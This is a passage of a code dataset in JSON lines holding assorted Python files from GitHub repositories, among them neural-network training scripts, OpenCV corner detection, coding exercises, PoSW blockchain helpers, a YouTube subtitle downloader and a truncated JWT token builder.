callbacks.CSVLogger(\"./log/netinnet_\" + dataset + \".log\", separator=',', append=False)\n else:\n csvlog = callbacks.CSVLogger(kwargs['logfile'], separator=',', append=False)\n\n if not 'bestModelfile' in kwargs:\n checkPoint = callbacks.ModelCheckpoint('./model/netinnet_' + dataset + \".h5\", save_best_only=True, monitor=\"val_acc\", verbose=1)\n else:\n checkPoint = callbacks.ModelCheckpoint(kwargs['bestModelfile'], monitor=\"val_acc\",\n save_best_only=True, verbose=1)\n cbks = [change_lr,csvlog, checkPoint]\n # set data augmentation\n # if you do not want to use data augmentation, comment below codes.\n print('Using real-time data augmentation.')\n datagen = ImageDataGenerator(horizontal_flip=True, width_shift_range=0.125, height_shift_range=0.125,\n fill_mode='constant', cval=0.)\n datagen.fit(x_train)\n iterations = x_train.shape[0]//batch_size\n #start training\n model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size), steps_per_epoch=iterations,\n epochs=epochs, callbacks=cbks, validation_data=(x_test, y_test))\n\n # start train\n # train without data augmentation\n # model.fit(x_train, y_train,\n # batch_size=128,\n # epochs=epochs,\n # callbacks=cbks,\n # validation_data=(x_test, y_test),\n # shuffle=True)\n\n","repo_name":"TestSelection/TestSelection","sub_path":"exp_models/cifar/Network_in_Network.py","file_name":"Network_in_Network.py","file_ext":"py","file_size_in_byte":9095,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"23270980871","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('cube.jpg')\nimgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nimgGray = np.float32(imgGray) # Makes Img float32-type, needed for cornerHarris()\n\n# Values vary, depends on Img\ndst = cv2.cornerHarris(imgGray, 2, 3, 0.04) # ..(input, bloxkSize, ksize, k): k is free parameter (harris detection)\n\n# Values vary, depends on Img\nimg[dst > 0.01 * dst.max()] = [0, 0, 255] # draw red (0, 0, 255) corners\n\ncv2.imwrite('dst.jpg', dst)\ncv2.imwrite('Detection.jpg', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"MrCode97/openCV","sub_path":"Detection/HarrisCorner/harrisCorner.py","file_name":"harrisCorner.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43126220479","text":"import train_lstm as lstm\nimport train_rnn as rnn\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch as tc\nimport torch.utils.data as data\nimport torch.nn as nn\nimport torch.autograd as ag\n\ntc.manual_seed(42)\n\nnet = 'RNN'\n# net='LSTM'\n\n'''Initialize Hyperparameters'''\nif net == 'RNN':\n hidden_size = 11 # number of hidden units x RNN\nelse:\n hidden_size = 5 # number of hidden units x LSTM\n\ninput_size = 1 # number of input units\noutput_size = 1 # number of output units\nnum_layers = 1 # number of layers\nnum_epochs = 201 # number of times the network is trained\nbatch_size = 300 # size of the input data used for one iteration\nstretch_length = 500 # length of the interval I use to build mini-batches\nlearning_rate = 0.01 # speed of convergence\n\n'''load data and divide in training and test set'''\nlorenz = np.load('data.npy') # Load the data\n\nT = lorenz.shape[0] # Length of time series\nT_train = np.rint(T * 0.6)\nT_train = int(T_train) # Length of the training set\n\n# divide in training and test set\ninputx = np.zeros([T - 1, input_size])\ninputx[0:, 0] = lorenz[0:-1]\ntargetx = np.zeros([T - 1, input_size])\ntargetx[0:, 0] = lorenz[1:]\n# training set\ninput_train = inputx[0:T_train, :]\ntarget_train = targetx[0:T_train, :]\n# test set\ninput_test = inputx[T_train:, :]\ntarget_test = targetx[T_train:, :]\n\n'''Data formatting'''\n# transform to tensor format (pytorch)\ntrain_input = tc.from_numpy(input_train).float()\ntrain_output = tc.from_numpy(target_train).float()\n\ntest_input = tc.from_numpy(input_test).float()\ntest_output = tc.from_numpy(target_test).float()\n\n# Does a so-called Dataset wrapping (needed for the next step):\ntrain_data = data.TensorDataset(train_input, train_output)\ntest_data = data.TensorDataset(test_input, test_output)\n\n'''Initialize classes: RNN and LSTM networks '''\n\n# first we initialize how the connections look like defining the weight types and the forward step\n\n\nclass MyRNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, num_layers):\n super(MyRNN, self).__init__() # Inherited from the parent class nn.Module\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.output_size = output_size\n self.num_layers = num_layers\n self.fc1 = nn.RNN(self.input_size, self.hidden_size, self.num_layers, nonlinearity='relu')\n self.fc2 = nn.Linear(self.hidden_size, self.output_size) # Define the output layer\n\n def forward(self, x): # Forward pass: stacking each layer together\n output, hidden = self.fc1(x)\n output = self.fc2(output)\n return output\n\n\nclass MyLSTM(nn.Module):\n def __init__(self, input_size, hidden_size, batch_size, output_size, num_layers):\n super(MyLSTM, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n self.num_layers = num_layers\n\n self.lstm = nn.LSTM(self.input_size, self.hidden_size, self.num_layers) # Define the LSTM layer\n self.linear = nn.Linear(self.hidden_size, output_size) # Define the output layer\n\n def init_hidden(self):\n # Initialization of hidden states\n return (ag.Variable(tc.zeros(self.num_layers, self.batch_size, self.hidden_size)),\n # Variable of Tensor of zeros with dimension (num_layer, bsz, hidden_size)\n ag.Variable(tc.zeros(self.num_layers, self.batch_size, self.hidden_size)))\n\n def forward(self, input):\n output, hidden = self.lstm(input)\n output = self.linear(output)\n return output\n\n\n''' Initialize '''\n# initialize the network based on parameters:\nif net == 'RNN':\n model = MyRNN(input_size, hidden_size, output_size=1, num_layers=1)\nelse:\n model = MyLSTM(input_size, hidden_size, batch_size, output_size=1, num_layers=1)\n\n# compute the number of parameters to be trained (just for personal information,\n# it is not relevant for the training itself)\npytorch_total_params = sum(p.numel() for p in model.parameters())\nprint('This model has ' + str(pytorch_total_params) + ' parameters to be trained')\n\n# choosing loss function\ncriterion = nn.MSELoss() # calculates a loss fct per minibatch based on Mean Squared Error\n# and optimizer\noptimizer = tc.optim.Adam(model.parameters(), lr=learning_rate) # Adaptive moment estimation\n# optimizer = to.optim.SGD(model.parameters(), lr=learning_rate) #Stochastic gradient descent\n\n\n''' Training '''\nif net == 'RNN':\n NetParameters, model, hist = rnn.training(criterion, optimizer, train_input, train_output, model, num_epochs,\n batch_size, stretch_length)\n tc.save(model.state_dict(), 'RNNmodel.pkl')\nelse:\n NetParameters, model, hist = lstm.training(criterion, optimizer, train_input, train_output, model, num_epochs,\n batch_size, stretch_length)\n tc.save(model.state_dict(), 'LSTMmodel.pkl')\n\n''' print loss'''\n\nplt.figure()\nplt.plot(hist)\nplt.suptitle('Training: loss', fontsize=20)\nplt.xlabel('epoch', fontsize=16)\nplt.ylabel('loss', fontsize=16)\nif net == 'RNN':\n plt.savefig('Training_loss_RNN.png', dpi=300)\nelse:\n plt.savefig('Training_loss_LSTM.png', dpi=300)\n\n''' plot error predicted and target time series '''\ninpt = tc.zeros(train_input.shape[0], 1, 1, dtype=tc.float)\ninpt[:, 0, :] = train_input\nX_train = ag.Variable(inpt)\nY_train = ag.Variable(train_output)\n\ny_pred = model(X_train) # apply the trained model to training set\n\nOT = y_pred.detach().numpy() # change format to print the time series\nTG = Y_train.detach().numpy()\n\nplt.figure()\nplt.plot(TG, label='train')\nplt.plot(OT[:, 0, 0], label='prediction')\nplt.legend()\nplt.suptitle('Training', fontsize=20)\nplt.xlabel('time', fontsize=16)\nplt.ylabel('signal', fontsize=16)\nif net == 'RNN':\n plt.savefig('Training_prediction_RNN.png', dpi=300)\nelse:\n plt.savefig('Training_prediction_LSTM.png', dpi=300)\n","repo_name":"eliaserland/heidelberg-courses","sub_path":"TSA&RNN/ex10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26638048402","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits import mplot3d\n\n\ndef visualize_position(experiment_name):\n output_folder = \"Experiment_Output/\" + experiment_name + \"/\"\n f = open(output_folder + \"positions.txt\", \"r\")\n\n T, X, Y, Z = [], [], [], []\n\n first_line = True\n first_ts = 0\n for line in f.readlines():\n split_line = line.split(',')\n if first_line:\n first_ts = int(split_line[0])\n first_line = False\n T.append(int(split_line[0]) - first_ts)\n X.append(float(split_line[1]))\n Y.append(float(split_line[2]))\n Z.append(float(split_line[3]))\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n plt.title(experiment_name)\n plt.tight_layout()\n ax.plot3D(X, Y, Z, 'gray')\n ax.scatter3D(X, Y, Z, c=Z, cmap='Greens')\n ax.set_xlabel('X Axis')\n ax.set_ylabel('Y Axis')\n ax.set_zlabel('Z Axis')\n plt.show()\n","repo_name":"SunBangjie/smartphone_pairing","sub_path":"VisualizePositions.py","file_name":"VisualizePositions.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24068393796","text":"from sys import stdin\n\n#Following is the Node class already written for the Linked List\nclass Node :\n def __init__(self, data) :\n self.data = data\n self.next = None\n\n\ndef evenAfterOdd(head):\n\n if head is None:\n return head\n\n evenHead, oddHead, evenTail, oddTail = None, None, None, None\n\n while head is not None:\n \n if (head.data % 2) == 0:\n \n if evenHead is None:\n evenHead = head\n evenTail = head\n else:\n evenTail.next = head\n evenTail = evenTail.next\n\n else:\n\n if oddHead is None:\n oddHead = head\n oddTail = head\n else:\n oddTail.next = head\n oddTail = oddTail.next\n\n head = head.next\n\n if oddHead is None:\n return evenHead\n else:\n oddTail.next = evenHead\n\n if evenHead is not None:\n evenTail.next = None\n\n return oddHead\n\n\n\n#Taking Input Using Fast I/O\ndef takeInput() :\n head = None\n tail = None\n\n datas = list(map(int, stdin.readline().rstrip().split(\" \")))\n\n i = 0\n while (i < len(datas)) and (datas[i] != -1) :\n data = datas[i]\n newNode = Node(data)\n\n if head is None :\n head = newNode\n tail = newNode\n\n else :\n tail.next = newNode\n tail = newNode\n\n i += 1\n\n return head\n\n\n#to print the linked list \ndef printLinkedList(head) :\n\n while head is not None :\n print(head.data, end = \" \")\n head = head.next\n\n print()\n\n\n#main\nt = int(stdin.readline().rstrip())\n\nwhile t > 0 :\n \n head = takeInput()\n newHead = evenAfterOdd(head)\n printLinkedList(newHead) \n \n t -= 1","repo_name":"KushRawat/CN-DSA-Python","sub_path":"Practice_1/LLt_evenAfterOdd.py","file_name":"LLt_evenAfterOdd.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30066539477","text":"\"\"\"\r\n\n\nWrite a function that makes the **first number as large as possible** by\nswapping out its digits for digits in the second number.\n\nTo illustrate:\n\n max_possible(9328, 456) ➞ 9658\n # 9658 is the largest possible number built from swaps from 456.\n # 3 replaced with 6 and 2 replaced with 5.\n\n### Examples\n\n max_possible(523, 76) ➞ 763\n \n max_possible(9132, 5564) ➞ 9655\n \n max_possible(8732, 91255) ➞ 9755\n\n### Notes\n\n * Each digit in the second number can only be used once.\n * Zero to all digits in the second number may be used.\n\n\"\"\"\r\n\ndef max_possible(n1, n2):\n n2_img = sorted(str(n2), reverse = True)\n n1_img = list(str(n1))\n for j, c in enumerate(n2_img):\n for i, h in enumerate(n1_img):\n if int(c) > int(h):\n n1_img[i] = n2_img[j]\n break\n return int(''.join(n1_img))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"FeNrBCG9rSdNeJTuX_9.py","file_name":"FeNrBCG9rSdNeJTuX_9.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29986654547","text":"\ndef is_apocalyptic(number):\n n = 2 ** number\n nn = str(n)\n c = nn.count(\"666\")\n if c == 0:\n return \"Safe\"\n elif c == 1:\n return \"Single\"\n elif c == 2:\n return \"Double\"\n elif c == 3:\n return \"Triple\"\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"gHrMmA7emP6CFAMnb_11.py","file_name":"gHrMmA7emP6CFAMnb_11.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24681885953","text":"n = int(input()) # n X n 크기 \nx, y = 1, 1\nplans = input().split()\n\n# L,R,U,D\ndx = [0,0,-1,1]\ndy = [-1,1,0,0]\nmove_types = ['L','R','U','D']\n\n# 이동 계획을 하나씩 확인\nfor plan in plans:\n # 이동 후 좌표 구하기\n for i in range(len(move_types)):\n if plan == move_types[i]:\n nx = x + dx[i] # 새로운 좌표\n ny = y + dy[i]\n \n # 공간을 벗어나는 경우 무시 (좌표를 업데이트 하지 x)\n if (nx<1) or (ny<1) or (nx>n) or (ny>n):\n continue\n # 이동 수행\n x, y = nx , ny\n\nprint(x,y)","repo_name":"shinho0902/coding_algorithm","sub_path":"이코테/구현_상하좌우.py","file_name":"구현_상하좌우.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2032204229","text":"from sqlalchemy import create_engine\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import sessionmaker\nfrom user_model import User\n\nclass DbUserRepository:\n def __init__(self,path):\n engine = create_engine(path)\n Session = sessionmaker(bind=engine)\n self.session = Session()\n\n def create(self,data):\n user = User(name=data[\"name\"])\n self.session.add(user)\n self.session.commit()\n return user.id\n\n def get(self,user_id):\n user = self.session.query(User).get(user_id)\n return {\"name\":user.name}\n\n def set(self,user_id,data):\n user = self.session.query(User).get(user_id)\n user.name = data[\"name\"]\n self.session.commit()\n","repo_name":"kotauchisunsun/falcon_crud_server","sub_path":"db_user_repository.py","file_name":"db_user_repository.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26961889603","text":"# coding: utf-8\n\n# 与えられた文字列���各文字を,以下の仕様で変換する関数cipherを実装せよ.\n\n# ・英小文字ならば(219 - 文字コード)の文字に置換\n# ・その他の文字はそのまま出力\n\n# この関数を用い,英語のメッセージを暗号化・復号化せよ.\n\ndef cipher(target):\n result = ''\n for c in target:\n if c.islower():\n result += chr(219 - ord(c))\n else:\n result += c\n return result\n\n\ntarget = input('文字列を入力してください-->')\n\n# 暗号化\nresult = cipher(target)\nprint('暗号化:' + result)\n\n# 復号化\nresult2 = cipher(result)\nprint('復号化:' + result2)\n\n# 復号化で元に戻っているかチェック\nif result2 != target:\n print('元に戻っていない!?')\nelse:\n print('OK')\n\n\n\n\n\n\n\n\n\n\n\n# 入力の判定\n# str.islower()を使います。\n# 文字列中の英字(上記参照)全てが小文字で、かつそれが1文字以上ある場合はTrue、そうでない場合はFalseを返します。\n\n# ord: アスキーコードを取得","repo_name":"taniko0416/100problems_of_NLP","sub_path":"0-9/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31973222331","text":"\nimport pandas as pd\nimport numpy as np\n\ndef recon(reg):\n integer = int(np.round((40*reg)**2)) # gives 2364 for our example\n for a in range(32):\n if (integer - a) % 31 == 0:\n A = a\n M = (integer - A)//31\n return A, M\n\ndef transform_df(train):\n calc_cols = [col for col in train.columns[train.columns.str.contains('calc')]]\n train = train.drop(calc_cols,axis=1)\n return train\n\ndef read_train_test():\n test = pd.read_csv('./data/test.csv')\n test['id'] = test['id'].astype(int)\n train = pd.read_csv('./data/train.csv')\n\n # Remove calc cols\n train = transform_df(train)\n test = transform_df(test)\n\n # Expand ps_car_03 based on: https://www.kaggle.com/pnagel/reconstruction-of-ps-reg-03\n # train['ps_reg_03_a'] = train['ps_reg_03'].apply(lambda x: recon(x)[0])\n # train['ps_reg_03_m'] = train['ps_reg_03'].apply(lambda x: recon(x)[1])\n # test['ps_reg_03_a'] = test['ps_reg_03'].apply(lambda x: recon(x)[0])\n # test['ps_reg_03_m'] = test['ps_reg_03'].apply(lambda x: recon(x)[1])\n\n ps_car_09_cat_mappings = {}\n ps_car_09_cat_mappings[4] = 1\n ps_car_09_cat_mappings[3] = 1\n ps_car_09_cat_mappings[2] = 1\n ps_car_09_cat_mappings[1] = 1\n ps_car_09_cat_mappings[0] = 0\n ps_car_09_cat_mappings[-1] = 1\n train['ps_car_09_cat_bin'] = train['ps_car_09_cat'].replace(ps_car_09_cat_mappings)\n test['ps_car_09_cat_bin'] = test['ps_car_09_cat'].replace(ps_car_09_cat_mappings)\n\n ps_car_07_cat_mappings = {}\n ps_car_07_cat_mappings[1] = 0\n ps_car_07_cat_mappings[0] = 1\n ps_car_07_cat_mappings[-1] = 1\n train['ps_car_07_cat_bin'] = train['ps_car_07_cat'].replace(ps_car_07_cat_mappings)\n test['ps_car_07_cat_bin'] = test['ps_car_07_cat'].replace(ps_car_07_cat_mappings)\n\n ps_car_05_cat_mappings = {}\n ps_car_05_cat_mappings[1] = 1\n ps_car_05_cat_mappings[0] = 1\n ps_car_05_cat_mappings[-1] = 0\n train['ps_car_05_cat_bin'] = train['ps_car_05_cat'].replace(ps_car_05_cat_mappings)\n test['ps_car_05_cat_bin'] = test['ps_car_05_cat'].replace(ps_car_05_cat_mappings)\n\n ps_car_03_cat_mappings = {}\n ps_car_03_cat_mappings[1] = 1\n ps_car_03_cat_mappings[0] = 1\n ps_car_03_cat_mappings[-1] = 0\n train['ps_car_03_cat_bin'] = train['ps_car_03_cat'].replace(ps_car_03_cat_mappings)\n test['ps_car_03_cat_bin'] = test['ps_car_03_cat'].replace(ps_car_03_cat_mappings)\n\n train = train.drop(['ps_car_09_cat','ps_car_07_cat','ps_car_05_cat','ps_car_03_cat'],axis=1)\n test = test.drop(['ps_car_09_cat','ps_car_07_cat','ps_car_05_cat','ps_car_03_cat'],axis=1)\n return train, test\n","repo_name":"xbno/Projects","sub_path":"Porto/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"15794378635","text":"import math\n\ndef desempacota(dado):\n # Info\n headSize = 5\n \n count = 0\n head = bytearray()\n pay = bytearray()\n eop = bytearray()\n \n for i in dado:\n if count < headSize:\n #print(i)\n if count == 0:\n head.extend(i.to_bytes(1,'big'))\n else:\n head.extend(i.to_bytes(2,'big'))\n count += 1\n tamanho = head[0]\n pacote = head[1] * 256 + head[2]\n maxPacotes = head[3] * 256 + head[4]\n #print(head)\n \n count = 1\n flagEop = 0\n correto = False\n corretoEop = False\n corretoPay = False\n flagStuff = []\n stuff = False\n\n for i in range(len(dado)):\n if i + 3 < len(dado):\n if dado[i] == 255 and dado[i+1] == 254 and dado[i+2] == 253 and dado[i+3] == 252: #0xFF 0xFE 0xFD 0xFC\n if i - 2 > 0:\n if dado[i-2] == 221 and dado[i-1] == 238: #2 bytes, 0xDD e 0xEE\n stuff = True\n flagStuff.append(i-2)\n else:\n corretoEop = True\n flagEop = i\n break\n\n dadoFiltro = bytearray()\n\n count = 0\n corretoStuff = False\n\n if stuff:\n for i in flagStuff:\n dadoFiltro = dado[:i-2*count] + dado[i+2-2*count:]\n count += 1\n else:\n dadoFiltro = dado\n\n flagEop -= count * 2\n\n if count == len(flagStuff):\n corretoStuff = True\n\n if (flagEop - headSize) == tamanho:\n corretoPay = True\n\n if corretoPay and corretoEop and corretoStuff:\n correto = True\n\n if correto:\n pay = dadoFiltro[headSize:flagEop]\n print(\"envio correto\")\n return pay\n else:\n if not corretoPay:\n print(\"erro no tamanho do payload\")\n elif not corretoEop:\n print(\"erro no EOP\")\n elif not corretoStuff:\n print(\"erro na remocao do stuff\")\n return -1\n \ndef empacota(dado):\n tipoEncode = \"utf-8\"\n sizeInteiro = len(dado)\n maxSize = 255 # 16 bits pra representar o tamanho do payload\n\n number = math.ceil(sizeInteiro/maxSize)\n count = number\n envio = bytearray()\n \n while count != 0:\n msg = bytearray()\n head = bytearray()\n pay = bytearray()\n eop = bytearray()\n\n atual = number - count\n\n # PAYLOAD\n if sizeInteiro <= maxSize:\n size = sizeInteiro\n carga = dado[0:]\n else:\n if count == 1:\n size = sizeInteiro - (number - 1)*maxSize\n carga = dado[(maxSize*atual+1):]\n else:\n if atual == 0:\n adendo = 0\n else:\n adendo = 1\n\n size = maxSize\n carga = dado[(maxSize*atual+adendo):(maxSize*(atual+1))]\n \n flagStuff = []\n stuff = False\n\n for i in range(len(dado)):\n if i + 3 < len(dado):\n if dado[i] == 255 and dado[i+1] == 254 and dado[i+2] == 253 and dado[i+3] == 252: #0xFF 0xFE 0xFD 0xFC\n flagStuff.append(i)\n stuff = True\n \n cargaFiltro = bytearray()\n contador = 0\n primeiroStuff = 221\n segundoStuff = 238\n if stuff: \n for i in flagStuff:\n cargaFiltro = carga[:i-2*contador]\n cargaFiltro.extend(primeiroStuff.to_bytes(1,'big'))\n cargaFiltro.extend(segundoStuff.to_bytes(1,'big'))\n cargaFiltro += carga[i-2*contador:]\n contador += 1\n else:\n cargaFiltro = carga\n\n # HEAD\n #So foi dado extend\n\n # EOP\n primeiro = 255\n segundo = 254\n terceiro = 253\n quarto = 252\n\n # MONTANDO #\n head.extend(size.to_bytes(1,'big')) \n head.extend(atual.to_bytes(2,'big'))\n head.extend((number-1).to_bytes(2,'big'))\n\n pay.extend(bytes(cargaFiltro))\n\n eop.extend(primeiro.to_bytes(1,'big'))\n eop.extend(segundo.to_bytes(1,'big'))\n eop.extend(terceiro.to_bytes(1,'big'))\n eop.extend(quarto.to_bytes(1,'big'))\n\n msg.extend(head)\n msg.extend(pay)\n msg.extend(eop)\n # ADICIONA A VARIAVEL PARA O BUFFER\n envio.extend(msg)\n \n count = count - 1\n #print(count)\n\n overhead = maxSize / (5 + maxSize + 4)\n print(\"Overhead: {}%\".format(overhead*100))\n\n return(envio)","repo_name":"vitorsv1/CamadaFisica","sub_path":"PARTE 1/Projeto 3 - Datagrama/VELHOS/pacote.py","file_name":"pacote.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43794637056","text":"\"\"\"Some helper functions for PoSW-related stuff.\"\"\"\nfrom collections import deque, Counter\nfrom typing import Callable, Optional, Union, Dict\n\nfrom cachetools import LRUCache\nfrom eth_keys.datatypes import Signature\nfrom eth_keys.exceptions import BadSignature\n\nfrom quarkchain.config import POSWConfig\nfrom quarkchain.core import (\n MinorBlockHeader,\n RootBlockHeader,\n PoSWInfo,\n RootBlock,\n MinorBlock,\n)\nfrom quarkchain.utils import check\n\nHeader = Union[MinorBlockHeader, RootBlockHeader]\nBlock = Union[MinorBlock, RootBlock]\n\n\ndef get_posw_coinbase_blockcnt(\n window_size: int,\n cache: LRUCache,\n header_hash: bytes,\n header_func: Callable[[bytes], Optional[Header]],\n) -> Dict[bytes, int]:\n \"\"\"PoSW needed function: get coinbase address counts up until the given block\n hash (inclusive) within the PoSW window.\n\n Raise ValueError if anything goes wrong.\n \"\"\"\n if header_hash in cache:\n addrs = cache[header_hash]\n return Counter(addrs)\n\n header = header_func(header_hash)\n length = window_size - 1\n if not header:\n raise ValueError(\"curr block not found: hash {}\".format(header_hash.hex()))\n height = header.height\n prev_hash = header.hash_prev_block\n if prev_hash in cache: # mem cache hit\n addrs = cache[prev_hash].copy()\n if len(addrs) == length:\n addrs.popleft()\n addrs.append(header.coinbase_address.recipient)\n else: # miss, iterating DB\n addrs = deque()\n for _ in range(length):\n addrs.appendleft(header.coinbase_address.recipient)\n if header.height == 0:\n break\n header = header_func(header.hash_prev_block)\n check(header is not None, \"mysteriously missing block\")\n cache[header_hash] = addrs\n check(len(addrs) <= length)\n return Counter(addrs)\n\n\ndef get_posw_info(\n config: POSWConfig,\n header: Header,\n stakes: int,\n block_cnt: Dict[bytes, int],\n stake_per_block: Optional[int] = None,\n signer: Optional[bytes] = None,\n) -> Optional[PoSWInfo]:\n if (\n not (config.ENABLED and header.create_time >= config.ENABLE_TIMESTAMP)\n or header.height == 0\n ):\n return None\n\n # evaluate stakes before the to-be-added block\n coinbase_recipient = header.coinbase_address.recipient\n\n required_stakes_per_block = stake_per_block or config.TOTAL_STAKE_PER_BLOCK\n block_threshold = min(config.WINDOW_SIZE, stakes // required_stakes_per_block)\n cnt = block_cnt.get(coinbase_recipient, 0)\n\n diff = header.difficulty\n ret = lambda success: PoSWInfo(\n diff // config.get_diff_divider(header.create_time) if success else diff,\n block_threshold,\n # mined blocks should include current one, assuming success\n posw_mined_blocks=cnt + 1,\n )\n\n # fast path\n if block_threshold == 0:\n return ret(False)\n\n # need to check signature if signer is specified. only applies for root chain\n if signer:\n check(isinstance(header, RootBlockHeader))\n if signer == bytes(20):\n return ret(False)\n block_sig = Signature(header.signature)\n try:\n pubk = block_sig.recover_public_key_from_msg_hash(\n header.get_hash_for_mining()\n )\n except BadSignature:\n return ret(False)\n\n if pubk.to_canonical_address() != signer:\n return ret(False)\n\n return ret(cnt < block_threshold)\n","repo_name":"QuarkChain/pyquarkchain","sub_path":"quarkchain/cluster/posw.py","file_name":"posw.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"32"} +{"seq_id":"28711441213","text":"n = int(input())\nscore = []\nfor _ in range(n): score.append(int(input()))\n\ndp = [0] * 300\ndp[0] = score[0]\n\nfor i in range(1, n):\n if i == 1 : dp[1] = dp[0] + score[1]\n elif i == 2 : dp[2] = max(score[0], score[1])+score[2]\n else : dp[i] = max(dp[i-3] + score[i-1], dp[i-2]) + score[i]\n\nprint(dp[n-1])","repo_name":"sbyeol3/Algorithm-Study","sub_path":"BOJ/Q2501-Q5000/Q2579.py","file_name":"Q2579.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4250499278","text":"from pytube import YouTube\nfrom pygame import mixer\nfrom pydub import AudioSegment\nimport urllib.request\nimport os\nimport re\n\ndef reduce(function, iterable, initializer=None):\n it = iter(iterable)\n if initializer is None:\n try:\n initializer = next(it)\n except StopIteration:\n raise TypeError('reduce() of empty sequence with no initial value')\n accum_value = initializer\n for x in it:\n accum_value = function(accum_value, x)\n return accum_value\n\ndef splitlist(iterable, where):\n def splitter(acc, item, where=where):\n if item == where:\n acc.append([])\n else:\n acc[-1].append(item)\n return acc\n return reduce(splitter, iterable, [[]])\n\n\ndef getsubs(link):\n\tsubs = YouTube(link).captions.all()[0].generate_srt_captions()\n\treturn subs\n\ndef subcleaner(sub):\n\tseperated = splitlist(sub.split(\"\\n\"), \"\")\n\tfor i in range(len(seperated)):\n\t\tseperated[i][1] = seperated[i][1].split(\" --> \")\n\t\ttime1 = seperated[i][1][0].split(\",\") \n\t\ttime1[0] = time1[0].split(\":\")\n\t\ttime1 = int(time1[0][0])*60*60 + int(time1[0][1])*60 + int(time1[0][2])\n\t\tseperated[i][1][0] = time1\n\n\t\ttime1 = seperated[i][1][1].split(\",\") \n\t\ttime1[0] = time1[0].split(\":\")\n\t\ttime1 = int(time1[0][0])*60*60 + int(time1[0][1])*60 + int(time1[0][2])\n\t\tseperated[i][1][1] = time1\n\treturn seperated \n\ndef GetLinks(search_string):\n html = urllib.request.urlopen(\"https://www.youtube.com/results?search_query=\" + search_string.replace(\" \", \"+\"))\n video_ids = re.findall(r\"watch\\?v=(\\S{11})\", html.read().decode())\n return \"http://youtube.com/watch?v=\" + str(video_ids[0])\n\n\ndef GetSong(link):\n\n video = YouTube(\"http://youtube.com/\" + link.split(\"/\")[-1] )\n\n try:\n video.streams\n except:\n return \"WRONG LINK ERROR\"\n\n try:\n songfile = str(video.streams.get_by_itag(251).download(timeout=30))\n except:\n return \"DOWNLOAD ERROR\"\n\n try:\n AudioSegment.from_file(songfile, \"webm\").export(str(songfile + \".ogg\"), format=\"ogg\")\n except:\n return \"CONVERT ERROR\"\n\n os.remove(songfile) \n if os.name == \"posix\":\n songpath = str(songfile+\".ogg\").split(\"/\")[-1]\n else:\n songpath = str(songfile+\".ogg\").split(\"\\\\\")[-1]\n \n os.rename(songfile+\".ogg\", songpath)\n\n return songpath\n\nlink = GetLinks(input(\"ENTER SONG NAME: \"))\n\nslean = subcleaner(getsubs(link))\nmixer.init()\nmixer.music.load(GetSong(link))\nmixer.music.play()\n\nwhile True:\n\n\tfor i in range(len(slean)):\n\t\tif slean[i][1][0]==int(mixer.music.get_pos()/1000):\n\t\t\tprint(slean[i][2])\n\n","repo_name":"HACKER097/galeki","sub_path":"subs.py","file_name":"subs.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14001291889","text":"import jwt\nimport time\nimport base64\nimport json\nimport hashlib\nimport hmac\nimport os\nimport requests\n\n# useridA=\"252\"\n# usernameA=\"Etdaegg684\"\n# useridB=\"0\"\n# usernameB=\"Etddxnu343\"\n# timeStamp=\"\"\nuserId = \"208283\"\nuserName = \"Etdegcu275\"\nticketId = 0\n\ndef create_token(uId, uname):\n print(\"---->uId: \" + uId)\n\n headers = json.dumps({\n \"typ\": \"JWT\",\n \"alg\": \"HS256\"\n })\n\n payload = {\n \"iss\": \"etongdai\",\n \"iat\": int(time.time()),\n \"exp\": int(time.time()) + 86400 * 7,\n \"sub\": '{\"userId\": \"%s\", \"username\": \"%s\"}' % (uId, uname)\n }\n \n signKey = 